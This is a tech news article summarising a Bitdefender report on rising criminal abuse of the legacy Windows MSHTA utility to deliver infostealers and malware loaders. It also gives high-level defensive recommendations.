- Bitdefender reports increasing abuse of legacy MSHTA utility to spawn infostealers and malware loaders
- Campaigns range from simple commodity threats like LummaStealer to advanced persistence tools like PurpleFox.
- Defenders are urged to restrict outdated script utilities and implement layered security controls to detect malicious script activity.
Researchers say cybercriminals are increasingly using a legitimate Windows legacy tool to deploy information stealers and malware loaders.
A new report from Bitdefender claims that since early 2026, there has been an increase in activity related to a Windows utility called Microsoft HTML Application Host (MSHTA), a legitimate utility that runs special HTML-based application files known as HTA.
While regular web pages open in a browser, HTA files interact directly with the Windows operating system and can execute scripts with elevated privileges.
Simple and complex threats
MSHTA is an old tool that was originally designed for light administrative and desktop tasks but, like many other legacy tools, is abused to run malicious scripts, download malware, or bypass security controls.
“Since the beginning of the year, we have seen an increase in MSHTA-related activity,” Bitdefender said. “Given that legitimate use of this utility is gradually fading, this trend likely reflects an increase in malicious activity rather than renewed administrative adoption.”
The activity the researchers analyzed spans multiple categories of malware, they further explained, saying they have seen both simple and more complex campaigns. At the “simpler” end, MSHTA is widely used to deliver commodity information stealers like Amatera or LummaStealer. Also used for loaders such as CountLoader or Emmenthal.
When it comes to more advanced and persistent threats, Bitdefender saw criminals deploy ClipBanker and PurpleFox.
“This range of abuses highlights why MSHTA remains important to defenders: it is not a single malware family or intrusion model,” they explained. “It remains useful across the spectrum, from opportunistic malware delivery to long-term compromise.”
To defend against MSHTA-based attacks, organizations should ensure both user awareness and layered security controls, it said. Users should avoid downloading untrusted files or running suspicious commands, while organizations should implement security tools capable of detecting malicious scripts or command line abuse.
The company also recommends restricting utilities like mshta.exe and wscript.exe whenever possible and replacing outdated scripting tools with modern alternatives to reduce the attack surface.
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds.
